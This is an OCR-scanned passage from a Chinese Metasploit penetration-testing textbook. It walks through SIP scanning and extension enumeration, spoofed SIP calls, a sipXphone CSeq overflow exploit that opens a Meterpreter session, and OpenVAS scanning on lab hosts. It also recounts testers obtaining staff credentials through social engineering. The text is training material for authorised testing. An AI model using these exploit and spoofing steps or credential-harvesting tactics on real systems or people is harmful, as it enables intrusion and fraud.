可 以 将 VOIP 技术 分 成 三 种 不 同 的 类 型 ， 现 在 来 看 看 它们 都 是 什么 。 
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3. 自 托管 网 络 


在 这 种 类 型 的 网 络 中 , PBX 通 常 被 安装 在 客户 端的 页 面 本 身 , 与 Internet 服务 提供 商 ( Internet 
Service Provider, ISP) 建立 远程 连接 。 这 种 类 型 的 网 络 连接 通常 通过 大 量 的 虚拟 局 域 网 向 PBX 
设备 发 送 VOIP 数 据 流量 ， 这 些 流 量 会 被 转发 给 公用 电话 交换 网 ( Public Switched Telephone 
Network，PSTN ) 和 ISP 以 进行 线路 交换 和 建立 互联 网 连接 。 下 图 给 出 了 一 个 图 形 化 的 例子 。 


四 二 一 人 
— > 
binl] 4 = 


互联 网 
] À PBX 
: 设备 
数据 VLAN 数据 VLAN 


声音 VLAN 


4. 托管 服务 


在 托管 服务 类 型 的 VOIP 技术 中 ， 客 户 端 都 不 存在 PBX。 但 是 ， 所 有 设备 都 是 在 客户 端 通过 
互联 网 连接 到 服务 提供 商 的 PBX， 也 就 是 使 用 IP/VPN 技 术 通 过 会 话 初始 协议 (Session Initiation 
Protocol, SIP ) 线路 连接 的 。 


让 我 们 在 下 图 的 帮助 下 看 看 这 项 技术 是 如 何 实 现 的 。 


2 

1 至 

| VPN/IP 
Q7 


158 第 5 章 使 用 Metasploit 对 服务 进行 测试 


5. SIP 服 务 提 供 商 


互联 网 上 有 很 多 的 SIP 服 务 提 供 商 ， 他 们 提供 了 可 以 直接 使 用 的 VOIP 服务 。 此 外 ， 可 以 使 用 
任何 客户 端 去 接 人 VOIP 服务 ， 例 如 Xlite， 如 下 图 所 示 。 


LD RECORD) | AA. | AC 
| æ 


5.3.2 对 VOIP 服务 踩点 


可 以 使 用 Metasploit 内 置 的 SP 扫描 模块 工具 来 对 网 络 中 的 VOIP 设备 进行 踩点 。 
为 著名 的 SIP 端 点 扫描 程序 (SIP endpoint scanner) 就 内 置 在 Metasploit 中 ， 可 以 通过 让 这 个 扫描 
器 发 出 各 种 SIP 服 务 的 options 请 求 来 查找 网 络 上 启用 了 SIP 服 务 的 设备 。 


继续 使 用 /auxiliary/scanner/sip 下 的 options 辅 助 模块 对 VOIP 进 和 TH, 并 对 扫描 的 
结果 进 和 卫 分 析 。 这 里 的 目标 是 一 个 运行 了 Asterisk PBX VOIP 客户 端的 XP 系 统 。 通 过 载 和 一 个 辅 
助 模 块 来 扫描 网 络 中 的 SP 服务， 如 下 图 所 示 。 


msf > use auxiliary/scanner/sip/options 
msf auxiliary(options) > show options 
Module options (auxiliary/scanner/sip/options): 
Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to probe in each se 
CHOST no The local client address 
CPORT 5060 no The local client port 
RHOSTS yes The target address range or CIDR identi 
fier 
RPORT 5060 yes The target port 
THREADS 1 yes The number of concurrent threads 
TO nobody no The destination username to probe at ea 
ch host 
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可 以 看 到 在 auxiliary/scanner/sip/options 辅 助 模块 中 有 很 多 可 以 配置 的 选项 ， 这 里 
必须 进行 配置 的 选项 只 有 RHosTS。 当 对 大 型 网 络 进行 配置 的 时 候 ， 可 以 使 用 无 类 别 域 际 路 由 选 
择 ( Classless Inter Domain Routing, CIDR ) 格式 来 定义 IP 地 址 段 。 当 模块 运行 起 来 后 ， 将 会 开始 
扫描 指定 JP 范围 内 可 能 使 用 SIP 服 务 的 设备 ， 运 行 这 个 模块 的 过 程 如 下 图 所 示 。 


msf auxiliary(options) > set RHOSTS 192.168.65.1/24 
RHOSTS => 192.168.65.1/24 
msf  auxiliary(options) > run 


[*] 192.168.65.128 sip:nobodyQ192.168.65.0 agent-'TJUQBGY ' 

[*] 192.168.65.128 sip:nobodyQ192.168.65.128 agent-'hAG' 

[*] 192.168.65.129 404 agent-'Asterisk PBX' verbs-'INVITE, ACK, CANCEL, OPTIONS, 
BYE, REFER, SUBSCRIBE, NOTIFY' 

[*] 192.168.65.128 sip:nobodyQ192.168.65.255 agent-'68T9c' 

[*] 192.168.65.129 404 agent-'Asterisk PBX' verbs-'INVITE, ACK, CANCEL, OPTIONS, 
BYE, REFER, SUBSCRIBE, NOTIFY' 

[*] Scanned 256 of 256 hosts (100% complete) 

[*] Auxiliary module execution completed 

msf auxiliary(options) > B 


我 们 清楚 地 看 到 ， 这 个 模块 在 成 功 运 行 之 后 会 返回 给 我 们 许多 使 用 了 SIP 服 务 的 设备 的 IP 相 
关 信 息 。 这 些 SIP 服 务 包 括 agent( 它 指示 PBX 的 名 称 和 版 本 ) 和 verbs ( 它 定 义 PBX 支 持 的 请 求 的 
类 型 )。 因 此 ， 可 以 使 用 这 个 模块 来 收集 网 络 上 的 SIP 服 务 的 相关 信息 。 


5.3.8 扫描 VOIP 服务 


找 出 目标 所 支持 的 各 种 选项 的 请 求 信 息 后 ， 现 在 让 我 们 使 用 另 一 个 Metasploit 模 块 
auxiliary/scanner/sip/enumerator 来 对 VOIP 服务 进行 扫描 和 用 户 列 举 。 这 个 模块 对 目标 
范围 内 的 VOIP 服务 进行 扫描 ， 并 试图 列举 出 所 有 用 户 。 下 面 来 看 一 下 这 个 模块 的 功能 。 


msf auxiliary(enumerator) > show options 
Module options (auxiliary/scanner/sip/enumerator): 
Name Current Setting Required Description 
BATCHSIZE 256 yes The number of hosts to probe in each set 
CHOST no The local client address 
CPORT 5060 no The local client port 
MAXEXT 9999 yes Ending extension 
METHOD REGISTER yes Enumeration method to use OPTIONS/REGISTER 
MINEXT 0 yes Starting extension 
PADLEN 4 yes Cero padding maximum length 
RHOSTS 192.168.65.128 yes The target address range or CIDR identifier 
RPORT 5060 yes The target port 
THREADS 1 yes The number of concurrent threads 


上 图 列举 了 这 个 模块 的 所 有 选项 。 为 了 能 使 用 该 模块 ， 必 须 对 其 中 的 一 些 选 项 进行 设置 。 
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msf auxiliary(enumerator) > set MINEXT 3000 
MINEXT -» 3000 

msf auxiliary(enumerator) > set MAXEXT 3005 
MAXEXT -» 3005 

msf auxiliary(enumerator) > set PADLEN 4 
PADLEN => 4 


如 图 所 示 ， 我 们 设置 了 MAXEXT、MINEXT、PADLEN 和 RHOSTS 选 项 。 


在 上 图 中 使 用 的 列举 模块 中 ， 我 们 分 别 将 MINEXT 和 MAXEXT 的 值 定义 为 3000 和 3005。 
MINEXT 是 查找 分 机 号 码 的 起 始 地 址 ，MAXEXT 是 查找 分 机 号 码 的 结束 地 址 。 可 以 将 这 些 选 项 设置 
成 一 个 相当 大 的 范围 , 例如 将 MINEXT 设 置 为 0, 将 MAXEXT 设 置 为 9999, 这 样 将 会 在 0~9999 地 址 
范围 内 使 用 VOIP 服 务 的 分 机 号 码 中 查找 用 户 。 


接 下 来 为 RHOSTS 变 量 赋 一 个 CIDR 格 式 的 值 来 运行 这 个 模块 ， 从 而 扫描 目标 范围 内 的 计算 
机 ， 如 下 图 所 示 。 


msf auxiliary(enumerator) > set RHOSTS 192.168.65.0/24 
RHOSTS => 192.168.65.0/24 


将 RHOSTS 的 值 设 定 为 192 .168.65.0/24, 该 模块 将 会 扫描 整个 目标 子 网 。 现在 运行 这 个 模 
块 ， 可 以 看 到 如 下 显示 。 


msf auxiliary(enumerator) > run 


Found user: 3000 «sip:30000192.168.65.129» [Open] 
Found user: 3001 «sip:30010192.168.65.129» [Open] 
Found user: 3002 «sip:30020192.168.65.129» [Open] 
Found user: 3000 «sip:30000192.168.65.255» [Open] 
Found user: 3001 «sip:30010192.168.65.255» [Open] 
Found user: 3002 «sip:30020192.168.65.255» [Open] 
Scanned 256 of 256 hosts (100% complete) 
Auxiliary module execution completed 


扫描 结果 显示 了 大 量 使 用 了 SIP 服 务 的 用 户 。 男 外 ， 由 于 之 前 设置 了 MAXEXT 和 MINEXT 的 值 ， 
该 模块 只 扫描 了 分 机 号 码 为 3000~3005 的 用 户 ,一 个 分 机 号 码 可 以 被 看 作 是 一 个 特定 网 络 中 用 户 
的 地 址 。 


一 


* * 关 关 X* 关 X* * 


bud land (nnd land ndi land Gad feed 


5.3.4 欺骗 性 的 VOIP 电话 


在 获得 了 足够 多 的 关于 使 用 SIP 服 务 的 用 户 信息 之 后 ,使 用 Metasploit 来 伪造 一 次 欺骗 性 的 通 
话 。 这 里 有 一 个 用 户 在 Windows XP 上 运行 着 SipXphone 2.0.6.27， 可 以 使 用 auxiliary/voip/ 
sip_invite_spoof 模 块 来 向 他 发 送 一 个 伪造 的 会 话 请 求 ， 过 程 如 下 图 所 示 。 
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mf » use auxiliary/voip/sip invite spoof 
sf auxiliary(sip invite spoof) » show options 


sf auxiliary(sip invite spoof) » back 

sf > use auxiliary/voip/sip invite spoof 

sf auxiliary(sip invite spoof) » set RHOSTS 192.168.65.129 
IRHOSTS z» 192.168.65.129 

sf auxiliary(sip invite spoof) » set EXTENSION 4444 
EXTENSION => 4444 


Module options (auxiliary/voip/sip_invite_spoof): 
Name Current Setting Required Description 
DOMAIN no Use a specific SIP domain 
EXTENSION 4444 no The specific extension or name to target 
MSG The Metasploit has you yes The spoofed caller id to send 
RHOSTS 192.168.65.129 yes The target address range or CIDR identifier 
RPORT 5060 yes The target port 
SRCADDR 192.168.1.1 yes The sip address the spoofed call is coming from 
THREADS 1 yes The number of concurrent threads 


我 们 将 参数 RHoSTS 的 值 设 定 为 目标 的 他 地 址 ， 将 1 
持 为 192 .168.1.1， 这 个 值 就 是 我 们 拨打 电话 时 伪造 的 源 地 址 。 


好 了 ， 现 在 运行 这 个 模块 。 


Ej 


sf auxiliary(sip invite spoof) » run 


[*] Sending Fake SIP Invite to: 44440192.168.65.129 
[*] Scanned 1 of 1 hosts (100* complete) 
[*] Auxiliary module execution completed 


现在 查看 受害 者 的 客户 端 。 


sipXphone 


Messages 


The Metasploit has you 


sip:192.168.1.1 


XTENSION 设 定 为 4444。SRCADDR 的 值 保 
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可 以 清楚 地 看 到 ,电话 软件 显示 有 来 电 了 。 显示 的 来 电 IP 为 192 .168.1.1, 同时 也 显示 了 来 
自 Metasploit 的 预定 义 消息 。 


5.3.5 对 VOIP 进行 渗透 


如 果 想 获得 系统 的 完全 控制 权限 ,也 可 以 尝试 对 电话 软件 进行 渗透 。 在 上 一 个 场景 中 , 我 们 
已 经 获得 了 目标 的 人 P 地 址 ， 接 下 来 让 我 们 使 用 Metasploit 对 其 进行 渗透 。 在 Kali 操 作 系 统 中 包含 了 
专门 设计 测试 VOIP 服 务 的 工具 。 


下 面 提供 了 一 个 可 以 用 来 渗透 VOIP 服务 的 工具 列表 。 


口 Smap 
口 Sipscan 
口 Sipsak 
口 Voipong 


口 Svmap 

现在 返回 到 渗透 的 内 容 ， 在 Metasploit 中 同样 包含 了 很 多 用 来 渗透 VOIP 软 件 的 功能 模块 ， 我 
们 来 看 一 个 这 样 的 例子 。 

这 里 要 渗透 的 目标 程序 是 sipXphone Version 2.0.6.27， 该 应 用 的 图 形 化 界面 如 下 图 所 示 。 


sipXphone 


Messages 


What does that button do? 
| in to see a Hint! 


Hold it dowi 
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1. 关于 漏洞 


这 个 漏洞 在 该 应 用 处 理 csea 值 的 时 候 产 生 。 发 送 一 个 超出 指定 长 度 的 字符 串 将 会 引起 该 程 
序 骨 演 ， 同 时 还 会 导致 攻击 者 运行 恶意 代码 并 获得 系统 的 管理 权限 。 


2. 对 应 用 的 渗透 攻击 


现在 开始 使 用 Metasploit 对 sipXphone Version 2.0.6.27 进 行 渗 透 。 要 用 到 的 渗透 模块 为 
exploit/windows/sip/sipxphone_cseq。 在 Metasploit 中 启动 这 个 模块 ,并 设置 必要 的 选项 。 


hsf > use exploit/windows/sip/sipxphone_cseq 

sf exploit(sipxphone cseq) > set RHOST 192.168.65.129 

HOST => 192.168.65.129 

msf exploit(sipxphone_cseq) > set payload windows/meterpreter/bind_tcp 
ayload => windows/meterpreter/bind_tcp 

hst exploit(sipxphone cseq) > set LHOST 192.168.65.128 

HOST => 192.168.65.128 

msf exploit(sipxphone cseq) > exploit 


这 里 必须 设置 RHOST、LHOST、 和 pay1load 的 值 。 当 一 切 设置 完毕 之 后 ， 开 始 对 目标 程序 
行 渗 透 ， 这 个 过 程 如 下 图 所 示 。 


sf exploit(sipxphone cseq) > exploit 


Es 


*] Started bind handler 

*] Trying target SIPfoundry sipXphone 2.6.0.27 Universal... 

*] Sending stage (752128 bytes) to 192.168.65.129 

*] Meterpreter session 2 opened (192.168.65.128:42522 -» 192.168.65.129:4444) at 2013-09-05 15:27:57 40530 


eterpreter » 


成 功 了 ! 我 们 不 费 吹 灰 之 力 就 获得 了 目标 的 Meterpreter 控 制 权 , 使 用 Metasploit 利 用 软件 的 漏 
洞 来 渗透 VOIP 是 一 项 极为 容易 的 任务 .如 果 要 对 VOIP 设备 或 其 他 设备 相关 的 漏洞 进行 高 效 测 试 ， 
可 以 使 用 第 三 方 工具 。 


6 从 以 下 网 址 可 以 找到 对 VOIP 进行 测试 的 优质 资源 : http://www.viproy.com。 


5.4 小 结 


在 本 章 中 , 我 们 见识 到 了 多 个 渗透 测试 。 在 这 些 场景 中 , 我 们 分 别 完成 了 对 各 种 服务 的 渗透 ， 
例如 数据 库 、VOIP 和 SCADA。 本 章 学 习 了 SCADA 以 及 它 的 基本 原理 , 如 何 获 得 一 个 数据 库 服 务 
的 各 种 信息 ,以 及 如 何 取得 这 个 数据 库 的 全 部 控制 权限 。 此 外 , 还 讲解 了 如 何 通过 扫描 网 络 上 的 
VOIP 客户 端 来 实现 VOIP 欺骗 ， 以 此 完成 对 VOIP 服务 的 测试 。 


下 一 章 将 介绍 如 何 使 用 Metasploit 和 其 他 的 流行 扫描 工具 来 完成 一 个 完整 的 渗透 测试 。 还 将 
涵盖 如 何 系统 地 实现 一 次 对 指定 目标 的 渗透 测试 , 介绍 如 何 创建 一 份 渗透 测试 的 报告 , 以 及 该 报 
告 中 应 该 包含 哪些 内 容 和 应 该 将 哪些 内 容 排除 在 外 。 
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“厨师 得 有 好 的 原料 才能 做 出 拿手 的 菜 葫 。 同 样 ， 渗 透 测 试 的 各 个 环节 都 得 精益 求 
精 ， 才 能 摘 得 胜利 的 果实 。” 


Binoj Koshy， 网 络 安 全 专家 

本 书 前 几 音 已 经 涵盖 了 大 量 的 渗透 相关 知识 , 现在 是 时 候 来 将 这 些 知 识 应 用 到 实践 中 了 。 我 
们 要 使 用 Metasploit 中 各 种 业内 领先 的 测试 工具 来 轻松 地 对 目标 网 络 、 网 站 或 者 其 他 服务 进行 渗 
透 测 斌 和 漏洞 评估 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 
口 让 Metasploit 与 其 他 各 种 渗透 测试 工具 协同 工作 。 
口 将 各 种 工具 和 各 种 格式 的 报告 导入 到 Metasploit 框 架 中 。 
口 创建 渗透 测试 报告 。 

本 章 的 重点 是 使 用 各 种 行业 内 流行 的 工具 与 Metasploit 一 起 进行 渗透 测试 ,不 过 Web 安 全 测试 
的 测试 阶段 可 能 与 其 他 类 型 的 安全 测试 有 所 不 同 ， 但 原则 仍然 是 相同 的 。 


6.1 使 用 Metasploit 集成 的 服务 完成 一 次 渗透 测试 


我 们 可 以 使 用 三 种 不 同 的 方法 来 完成 一 次 渗透 测试 , 分 别 是 白 盒 测 试 、. 黑 盒 测 试 和 灰 盒 测试 。 
盒 测 试 指 的 是 渗透 测试 工程 师 已 经 掌握 了 系统 的 全 部 信息 ， 而 且 客 户 将 会 提供 所 有 账户 信息 、 
源 代码 和 其 他 与 环境 有 关 的 必要 信息 。 黑 盒 测试 指 的 是 渗透 测试 工程 师 此 前 对 目标 的 信息 掌握 量 
几乎 为 零 。 灰 盒 测 试 介 于 两 者 之 间 , 指 的 是 渗透 测试 工程 师 仅 掌握 了 少量 或 部 分 环境 信息 。 我 们 
将 在 本 章 的 下 一 节 展 示 一 次 灰 盒 测试 ， 因 为 这 种 测试 方法 最 大 程度 上 结合 了 另外 两 种 方法 的 优 
点 。 灰 盒 测 试 可 能 包含 ， 也 可 能 不 包含 操作 系统 (Operating System, OS) 的 细节 、 部 署 的 Web 
应 用 程序 、 运 行 的 服务 器 版 本 以 及 完成 渗透 测试 所 需 的 所 有 其 他 技术 细节 。 灰 盒 测试 所 需 的 部 分 
言 息 要 求 测试 人 员 使 用 扫描 获取 ， 因 此 它 的 耗 时 将 比 黑 盒 测试 少 ， 但 是 比 白 盒 测试 多 。 


假设 我 们 知道 目标 服务 器 上 运行 着 Windows 操 作 系统 , 但 不 知道 其 确切 版 本 。 在 这 种 情况 下 ， 
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我 们 就 可 以 将 Linux 和 Unix 系 统 的 踩点 技术 去 掉 ， 将 全 部 精力 都 放 在 Windows 版 本 的 检查 上 。 这 
样 可 将 处 理 范 围 局 限 在 单一 系统 内 ， 而 无 须 考 虑 所 有 类 型 的 系统 ， 从 而 节省 了 大 量 时 间 。 


以 下 是 使 用 灰 盒 测试 技术 进行 渗透 测试 的 各 个 阶段 。 


和 


对 威胁 区 域 进行 建 模 


£P E Eo E TEE 
漏洞 攻击 的 系统 做 准 


获取 访问 权限 


ER. ENIM 


上 图 清楚 地 说 明了 灰 盒 测试 包括 的 各 个 阶段 。 男 外 ， 图 中 使 用 虚线 框 的 阶段 并 不 是 必需 的 。 
而 使 用 双 线 框 表示 的 阶段 是 关键 阶段 ， 使 用 单线 框 表示 的 阶段 是 在 进行 测试 时 要 遵循 的 标准 阶 
段 。 现 在 开始 渗透 测试 并 对 灰 盒 测试 的 各 个 方面 进行 分 析 。 


6.14.1 与 员工 和 最 终 用 户 进行 交流 


进入 客户 的 工作 场所 后 要 做 的 第 一 件 事 情 就 是 与 员工 以 及 最 终 用 户 进行 交流 。 这 个 阶段 进行 
的 主要 是 非 技术 型 黑客 行为 , 也 就 是 社会 工程 学 。 这 样 做 的 目的 是 为 了 以 最 终 用 户 的 角度 收集 目 
标 系统 的 信息 。 这 个 阶段 同样 也 检测 了 目标 组 织 的 最 终 用 户 是 否 会 因 泄露 内 部 的 信息 从 而 导致 系 
统 安全 被 破坏 。 下 面 的 例子 应 该 可 以 让 你 对 此 有 一 个 更 深 的 了 解 。 


去 年 ， 我 们 的 团队 开展 了 一 次 和 白 盒 测试 。 我 们 来 到 客户 的 工作 场所 进行 进一步 的 内 部 测试 。 
到 那里 之 后 ， 我 们 开始 与 最 终 用 户 交 流 ， 询 问 他 们 在 使 用 新 安装 的 系统 时 是 否 遇 到 了 什么 问题 。 
出 人 意料 的 是 , 他 们 谁 都 不 允许 我 们 接触 他 们 的 系统 。 但 他 们 很 快 解释 说 这 是 因为 有 一 个 登录 问 
Ei, 一 段 时 间 内 不 允许 连接 超过 10 次 。 


虽然 知道 这 是 客户 公司 的 安全 策略 ， 但 是 我 们 对 于 不 能 使 用 任何 客户 端 还 是 有 些 惊 讶 。 不 过 
后 来 , 我 们 团队 的 一 个 成 员 发 现 了 一 位 55~60 岁 的 老 员工 在 使 用 互联 网 时 遇 到 了 问题 。 我们 过 去 询 
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问 他 是 否 需要 些 帮 助 ， 他 的 回答 是 肯定 的 。 我 们 告诉 他 可 以 用 我 们 带 来 的 笔记 本 连接 到 局 域 网 中 
工作 。 他 把 网 线 搬 到 了 我 们 的 笔记 本 电脑 上 ， 然 后 开始 工作 。 我 们 中 一 个 站 在 他 身后 的 同事 使 用 
手中 的 摄像 笔记 录 了 这 位 老 员 工 的 所 有 操作 ， 例 如 他 登录 系统 的 账号 。 


我 们 又 发 现 了 一 位 系统 出 现 问题 的 女士 , 她 说 她 经 常 在 登录 的 时 候 遇 到 问题 。 我 们 随即 告诉 
她 , 我 们 将 尽快 解决 , 但 是 我 们 需要 她 的 账户 信息 以 便 从 后 全 进行 处 理 。 男 外 我 们 还 对 她 说 , 需 
要 她 将 用 户 名 、 密 码 以 及 登录 的 IP 地 址 告诉 我 们 。 她 很 快 同意 了 ， 并 将 这 一 切 都 告诉 了 我 们 。 通 
过 这 个 例子 可 以 得 出 这 样 的 结论 : 无 论 这 些 网 络 环境 设置 得 多 么 安全 ， 当 员工 遇 到 问题 时 , 他们 
都 可 能 会 轻易 地 泄露 自己 的 登录 信息 。 我 们 后 来 将 这 些 内 容 作为 报告 的 一 部 分 汇报 给 了 客户 。 


从 最 终 用 户 处 可 以 获得 的 其 他 类 型 的 有 用 信息 包括 下 面 这 些 。 


口 他 们 工作 时 所 使 用 的 技术 。 
口 服务 器 平台 和 操作 系统 的 详细 信息 。 
口 隐藏 的 登录 人 P 地 址 或 者 管理 区 域 地 址 。 
口 系统 的 配置 和 操作 系统 的 详细 信息 。 
口 Web 服 务 右 的 后 台 技术 。 

这 些 信息 在 对 可 测试 的 系统 进行 先 验 性 技术 测试 时 是 必需 的 ， 将 有 助 于 确定 测试 的 关键 
区 域 。 

不 过 ， 这 个 阶段 在 进行 灰 盒 测试 时 并 不 是 必需 的 。 比 如 说 有 时 你 的 客户 只 是 需要 你 完成 对 
他 们 网 站 的 测试 ， 或 者 你 的 客户 公司 在 一 个 很 远 的 地 方 ， 甚 至 跟 你 不 在 同一 个 国家 。 在 这 些 情 
况 下 ， 我 们 将 略 过 这 个 阶段 ， 并 向 公司 的 管理 员 或 者 其 他 工作 人 员 询 问 他 们 目前 正在 使 用 的 各 
种 技术 。 


6.1.2 ”收集 信息 

在 与 最 终 用 户 交 流 完 之 后 ,我 们 需要 研究 网 络 配 置 并 从 目标 网 络 获取 更 多 信息 。 同 时 ， 从 最 
终 用 户 处 收集 到 的 信息 可 能 是 不 全 面 甚至 是 错误 的 ,渗透 测试 工程 师 的 职责 之 一 就 是 将 每 一 个 细 
节 再 确认 一 遍 ， 因 为 误 报 和 伪造 的 信息 可 能 会 使 渗透 测试 出 现 问 题 。 

音 息 收集 包括 获取 目标 网 络 的 深入 细节 、 所 使 用 的 技术 、 正 在 运行 的 服务 版 本 ， 等 等 。 

这 些 信息 可 以 从 最 终 用 户 、 管 理 员 、 网 络 工程 师 处 收集 。 在 进行 远程 测试 或 者 信息 收集 不 完 
整 的 时 候 ， 可 以 使 用 各 种 漏洞 扫描 工具 (例如 Nessus 、GFI 局 域 网 卫 十 、OpenVAS 等 ) 来 获取 缺 
少 的 信息 ， 例 如 操作 系统 、 服 务 、TCP 或 者 UPD 端 口 。 

在 下 一 节 中 ， 我 们 会 使 用 行业 内 最 优秀 的 工具 (例如 Nessus 和 OpenVAS ) 来 收集 信息 。 不 过 
在 开始 这 个 任务 之 前 , 可 以 先 使 用 客户 端 访问 页 面 、 进 行 前 期 交互 或 用 问卷 调查 等 方法 获取 一 部 
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分 待 测试 环境 的 信息 。 
测试 环境 示例 


根据 通过 问卷 调查 、 前 期 交互 和 用 客户 端 访问 页 面 等 方法 收集 到 的 信息 , 我 们 得 出 以 下 的 测 
试 环 境 示例 。 


ios 


我 们 已 经 获得 了 对 目标 网 络 的 VPN 访 问 权 限 , 目标 是 对 一 个 网 络 进行 测试 。 我 们 还 知道 在 IP am 
地 址 为 192.168.10.104 的 主机 上 运行 的 操作 系统 为 Windows Server 2012 R2 版 。 


假设 这 里 已 经 如 同 第 1 章 介绍 的 那样 使 用 NMAP 完 成 了 对 目标 的 扫描 ， 让 我 们 使 用 Metasploit 
和 其 他 行业 顶尖 工具 来 完成 一 次 全 面 的 渗透 测试 。 第 一 个 登场 的 工具 是 OpenVAS。 这 是 一 款 漏洞 
扫描 软件 ,是 世界 上 最 先进 的 漏洞 管理 工具 之 一 。OpenVAS 最 大 的 优势 在 于 它 是 完全 免费 的 ， 这 
一 点 使 它 成 为 小 型 公司 和 个 人 的 最 佳 选择 。 虽然 OpenVAS 有 时 也 会 出 现 一 些 问题 , 而 且 可 能 需要 
你 花费 很 多 精力 去 手动 修复 这 些 错误 , 但 是 作为 行业 瑰宝 之 一 ,OpenVAS 一 直 是 我 最 为 欣赏 的 漏 
洞 扫描 程序 。 


如 果 需 要 在 Kali Linux 中 安装 OpenVAS , 可 以 参考 以 下 网 址 提供 的 资料 https:// 
www.kali.org/penetration-testing/openvas-vulnerability-scanning/。 
6.1.3 ”使 用 Metasploit 中 的 OpenVAS 插件 进行 漏洞 扫描 


为 了 将 OpenVAS 整 合 到 Metasploit 中 ， 首 先 需要 在 Metasploit 中 加 载 OpenVAS 插 件 ， 过 程 
如 下 。 
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msf > load 

load alias load msgrpc 
load auto add route load nessus 
load db credcollect load nexpose 


load db tracker load openvas 

load event tester load pcap log 

load ffautoregen load request 

load ips filter load sample 

load lab load session tagger 
load msfd load socket logger 


msf > load openvas 


[*] Welcome to OpenVAS integration by kost and averagesecurityguy. 


[*] OpenVAS integration requires a database connection. Once the 
[*] database is ready, connect to the OpenVAS server using openvas connect. 
[*] For additional commands use openvas help. 


[*] Successfully loaded plugin: OpenVAS 


load sounds 

load sqlmap 

load thread 

load token adduser 
load token hunter 
load wiki 

load wmap 


可 以 看 到 , 在 Metasploit 中 还 包含 了 很 多 流行 的 工具 模块 , 例如 SQLMAP 、Nexpose 和 Nessus。 
为 了 将 OpenVAS 插 件 加 载 到 Metasploit 中 , 需要 在 Metasploit 的 控制 台中 输入 命令 load openvas。 


上 图 显示 了 一 个 在 Metasploit 中 成 功 加 载 OpenVAS 插 件 的 过 程 。 


为 了 能 在 Metasploit 中 使 用 OpenVAS 的 功能 ， 需 要 将 Metasploit 中 的 OpenVAS 插 件 与 OpenVAS 
软件 本 身 连 接 起 来 。 这 一 点 可 以 通过 在 命令 openvas_connect 后 面 添加 用 户 任 证、 服务 器 地 址 、 


端口 号 和 SSL 状 态 实现 ， 整 个 过 程 如 下 图 所 示 。 


msf > openvas connect admin admin localhost 9390 ok 
[*] Connecting to OpenVAS instance at localhost:9390 wi 


th username admin... 


OpenVAS connection successful 


msf » 


在 正式 开始 之 前 , 我 们 先 来 了 解 一 下 工作 区 的 概念 。 使 用 工作 区 是 一 个 管理 渗透 测试 的 绝 佳 
选择 , 特别 是 当 你 在 一 家 专门 从 事 渗透 测试 和 漏洞 评估 的 公司 工作 的 时 候 。 我 们 可 以 为 不 同 的 项 
目 创建 不 同 的 工作 区 , 从 而 轻松 管理 这 些 项 目 。 使 用 工作 区 可 以 确保 不 会 将 本 次 测试 和 其 他 项 目 
的 结果 和 弄 混 。 因 此 ， 我 强烈 建议 你 在 进行 渗透 测试 的 时 候 使 用 工作 区 。 


新 工作 区 的 创建 以 及 工作 区 之 间 的 切换 十 分 简 


单 ， 下 图 给 出 了 工作 区 的 操作 实例 。 


Imsf > workspace -h 
Usage: 
workspace 
workspace [name] 
workspace -a [name] 


workspace -d [name] 
workspace -D 

workspace -r «old» «new» 
workspace -h 


msf > workspace -a NetScan 
[*] Added workspace: NetScan 
msf > workspace NetScan 

[*] Workspace: NetScan 

msf > 


List workspaces 

Switch workspace 

Add workspace (s) 

Delete workspace(s) 

Delete all workspaces 
Rename workspace 

Show this help information 
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在 上 网 中 ,我 们 添加 了 一 个 名 为 NetScan 的 新 工作 区 ， 然 后 仅 通 过 输入 workspace 命 令 和 
NetScan (工作 区 的 名 字 ) 就 切换 到 了 这 个 工作 区 。 


要 启 动 漏洞 扫描 第 一 件 要 做 的 事 就 是 创建 H 标 。 可 以 使 用 命令 openvas_ta rget_create 
来 创建 任意 数量 的 目标 ， 如 下 图 所 示 。 


msf > openvas target create 

[*] Usage: openvas target create «name» «hosts» «comment» 

msf > openvas target create outer 192.168.10.104 Outer-Interface 

[*] OK, resource created: 5da01e90-d98d-4edd-83e8-2000b934d160 
OpenVAS list of targets 


ID Name Hosts Max Hosts In Use Comment 
o Localhost localhost 1 0 
1 outer 192.168.10.104 1 0 Outer-Interface 


我 们 已 经 创建 了 IP 地 址 为 192 .168.10.104 的 目标 , 它 的 名 字 为 outer, 备注 为 Outer-Interface 
(为 了 对 目标 进行 说 明 )。 最 好 记 住 这 个 目标 的 ID 。 

接 下 来 需要 为 被 测试 的 目标 定义 一 个 策略 。 可 以 使 用 openvas_config_l1ist 命 令 列 出 示例 
策略 ， 如 下 图 所 示 。 


msf > openvas config list 
OpenVAS list of configs 


ID Name 

Discovery 

empty 

Full and fast 

Full and fast ultimate 

Full and very deep 

Full and very deep ultimate 
Host Discovery 

System Discovery 


NOUA 0) N-12 


出 于 学 习 的 目的 ， 我 们 选择 使 用 Full and fast 策 略 。 留 心 一 下 策略 ID， 这 里 对 应 的 卫 是 2。 


现在 已 经 知道 了 目标 ID 和 策略 ID ， 可 以 更 进一步 ， 使 用 如 下 图 所 示 的 命令 openvas_task_ 
create 来 创建 一 个 漏洞 扫描 任务 。 


msf > openvas target list 
OpenVAS list of targets 


ID Name Hosts Max Hosts In Use Comment 
0 Localhost localhost 1 0 
1 outer 192.168.10.104 1 0 Outer-Interface 


msf » openvas task create Netscan ScanForVulns 2 1 
[*] OK, resource created: 675d2302-6978-407e-8320-e206e2130890 
OpenVAS list of tasks 


ID Name Comment Status Progress 


0 Netscan ScanForVulns New -1 
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我 们 已 经 使 用 openvas_task_create 命 令 和 2 (策略 ID )、1 ( 目标 ID ) 创建 了 一 个 新 的 任 
务 。 成 功 创建 任务 之 后 ， 就 可 以 按 下 图 所 示 开 始 扫描 了 。 


msf > openvas task start 

Usage: openvas task start «id» 
> openvas task start 0 

OK, request submitted 


[*1 
msf 


从 上 图 中 可 以 看 到 ， 我 们 已 经 使 用 openvas_task_start 命 令 和 任务 ID 完成 了 扫描 的 初始 
化 。 现 在 使 用 openvas_task_1ist 命 令 来 查看 一 个 任务 的 进度 ， 如 下 图 所 示 。 


Imsf > openvas task list 
OpenVAS list of tasks 


ID Name Comment Status Progress 


9 Netscan ScanForVulns Running 40 


保持 对 任务 进度 的 观察 ， 直 至 任务 结束 。 然 后 使 用 openvas_report_1ist 命 令 列 出 扫描 报 
告 ， 过 程 如 下 图 所 示 。 


msf > openvas report list 
OpenVAS list of reports 


ID Task Name Start Time Stop Time 


9 Netscan 2016-06-19T15:08:39Z2 2016-06-19T15:19:03Z 


